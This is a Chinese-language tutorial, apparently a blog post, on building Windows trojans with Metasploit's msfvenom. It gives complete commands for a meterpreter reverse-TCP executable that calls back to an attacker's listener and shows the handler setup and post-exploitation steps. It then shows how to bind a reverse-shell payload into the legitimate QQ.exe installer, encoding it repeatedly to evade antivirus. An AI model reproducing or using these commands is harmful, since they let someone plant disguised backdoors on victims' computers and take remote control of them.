MSF生成windows木马

msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

生成exe木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe
192.168.0.110是攻击者的监听机器,4444是被攻击机器监听端口

开启kali监听

  • 启动msfconsole
    MSF生成windows木马_第1张图片
  • 开启监听
    use exploit/multi/handler
  • 设置tcp监听
    set payload windows/meterpreter/reverse_tcp
    选择监听类型
    设置参数
  • 输入explore开始监听

木马上线

当被攻击的机器(我的是windows xp)点击生成的123.exe木马时,即可以监听到木马上线
MSF生成windows木马_第2张图片

  • 查看系统信息
    MSF生成windows木马_第3张图片
  • 查看系统截图
    MSF生成windows木马_第4张图片
    等等可以一系列后渗透操作。。

msf绑定软件做木马

msf也可以绑定正常软件运行,在用户看来软件正常运行,但是这个软件后台同时偷偷启动木马程序,就拿一个qq软件做例子
MSF生成windows木马_第5张图片
将QQ.exe用作绑定木马

查看编码类型

msfvenom -l encoders
MSF生成windows木马_第6张图片
如图,有很多类型编码,我们选择x86/shikata_ga_nai 编码

捆绑木马

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe
其中-i 5是进行5次编码,其目的是为了面杀作用,但是这样作用已经没用了,照样被杀。生成了QQ2.exe文件

木马上线

  • 启动监听
    MSF生成windows木马_第7张图片
  • exploit回车开始监听
  • 将QQ2.exe文件拷贝回被攻击的机器,点击启动
    MSF生成windows木马_第8张图片
  • kali监听显示上线,但是在windows上的qq软件点击后却没有启动,不知道什么情况,有空研究一下
  • 查看windows端口,发现8080后门端口被打开
    端口查看

你可能感兴趣的:(msf,metasploit,Windows,木马,网络安全,网络编程)